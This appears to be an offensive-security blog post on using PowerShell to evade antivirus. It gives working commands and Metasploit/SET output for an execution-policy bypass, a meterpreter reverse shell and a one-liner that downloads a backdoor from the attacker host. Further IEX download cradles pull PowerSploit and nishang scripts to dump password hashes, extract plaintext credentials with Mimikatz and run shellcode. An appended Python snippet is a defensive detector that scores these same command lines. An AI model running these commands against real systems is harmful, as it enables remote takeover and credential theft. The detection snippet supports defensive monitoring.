Powershell tricks: Bypass AV
0x00 Powershell Introduction
PowerShell is to Windows what bash is to Linux. It is built on the .NET Framework, which is powerful and can also call Windows APIs. Since Windows 7 / Server 2008, PowerShell has been integrated into the system. PowerShell's powerful features bring great convenience to Windows management and also facilitate penetration testing on Windows.
0x01 PowerShell Execution Policy
By default, PowerShell scripts cannot be run by double-clicking them or by invoking them from cmd. This execution policy has to be bypassed in some way. The simplest way is to run powershell.exe with the command to execute appended to it, or to paste the script to be executed directly into the PowerShell window. You can also download and execute, as shown in the following example.
If you need to execute a .ps1 file, you can also do this:
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
We do not recommend changing the execution policy globally by other means. Choose the execution method that fits the scenario.
0x02 Reverse Shell
When protection software is present, you can use PowerShell to execute shellcode and get a shell back. The script can be generated by msf or by the SET toolkit. Note that msf generates a ps1 file, whereas SET generates a bat file. The SET process is as follows:
Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
..SNIP...
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 10

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

  99) Return to Main Menu

set:powershell>1
set> IP address for the payload listener: 192.168.200.159
set:powershell> Enter the port for the reverse [443]:4444
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes
..SNIP...
[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444
lport => 4444
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.200.158
[*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2   192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)
The generated files are under /root/.set/reports/powershell. Specifically, x86_powershell_injection.txt is the bat file; it can be renamed and run directly. Here is a one-liner that uses PowerShell to download a file:
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.200.159/backdoor','backdoor.bat')
Then run it to get the meterpreter session.
The shell (cmd) command, hash dumping and plaintext dumping can all be executed normally in the session.
0x03 Dump the hash
Of course, if you only need to dump hashes, you can also use PowerShell:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
0x04 Dump the plain Password
You can also use the following method (running Mimikatz from PowerShell) to obtain the plaintext.
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCerts
Note that Mimikatz commands can also be run through the Command parameter here.
0x05 Memory Dumping
PowerShell can also do the same job as procdump and dump a process's memory. In this example, a dump of lsass.exe is obtained, and Mimikatz is used to extract plaintext credentials from the dump.
Then download the lsass dump file and analyze it with Mimikatz to obtain the plaintext password.
Of course, memory dumps do not only yield the Windows password; other important information or data may be stored in process memory. See http://blog.spiderlabs.com/2012/07/pentesting-like-an-eastern-european.html.
0x06 Execute the shellcode
Because PowerShell's rich extension functions make it easy to call Windows APIs, it can also execute shellcode. The process is as follows:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -help
However, there is a problem: there is little existing x64 shellcode, and the shellcode collected on the internet is usually x86. If you execute x86 shellcode directly from the 64-bit PowerShell, an error occurs.
Use the 32-bit PowerShell (under SysWOW64) to execute x86 shellcode. The process is as follows:
c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90 ...
This process applies to the shellcode generated by most msfpayload invocations. Of course, there are other ways to execute shellcode on Windows, such as shellcodeexec. However, that method does not bypass AV by itself, although you can build a bypass based on its source code.
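From the defender's side, the pieces this post relies on (the -ExecutionPolicy Bypass switch in 0x01, the IEX/DownloadString cradles in 0x03 to 0x06, the PowerSploit/nishang cmdlet names, and the SysWOW64 PowerShell path) are exactly what PowerShell script block logging (Event ID 4104) and process command-line auditing record. The following Python triage snippet is an added example and not part of the original post: the sample events are constructed from the post's own command lines, the rule names, weights and threshold are assumptions, and a lone -ExecutionPolicy Bypass deliberately stays below the threshold because administrators use it routinely.

```python
import re

# Constructed sample command lines / script-block texts, modelled on the
# techniques shown in this post (not real telemetry; the example.invalid
# host is a placeholder).
SAMPLE_EVENTS = [
    r"PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1",
    r"powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes",
    r"c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90",
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users",
]

# Each rule: (name, compiled pattern, weight). Patterns are case-insensitive
# and whitespace-tolerant because the post shows several spellings of the
# same cradle. Weights are assumptions: a cradle or a known offensive
# cmdlet is strong evidence, an execution-policy switch alone is weak.
RULES = [
    ("exec-policy-bypass", re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I), 2),
    ("download-cradle", re.compile(r"new-object\s+(?:system\.)?net\.webclient.*?\.download(?:string|file)\(", re.I), 3),
    ("iex-of-download", re.compile(r"\biex\b.*?download(?:string|file)", re.I), 2),
    ("syswow64-powershell", re.compile(r"syswow64\\windowspowershell", re.I), 2),
    ("offsec-cmdlet", re.compile(r"\b(?:invoke-mimikatz|get-passhashes|invoke-shellcode)\b", re.I), 4),
    ("raw-github-source", re.compile(r"raw\.githubusercontent\.com", re.I), 1),
]


def score_event(text):
    """Return (score, [matched rule names]) for one command line / script block."""
    hits = [name for name, pat, _ in RULES if pat.search(text)]
    score = sum(w for name, _, w in RULES if name in hits)
    return score, hits


def triage(events, threshold=3):
    """Return the events whose score meets the threshold, with their hits."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({"event": ev, "score": score, "hits": hits})
    return flagged


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["score"], f["hits"], f["event"][:70])
```

Feed it the ScriptBlockText of 4104 events or the CommandLine field of process-creation events; tune the weights and threshold to what your own administrators' scripts normally look like before alerting on it.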
To be continued.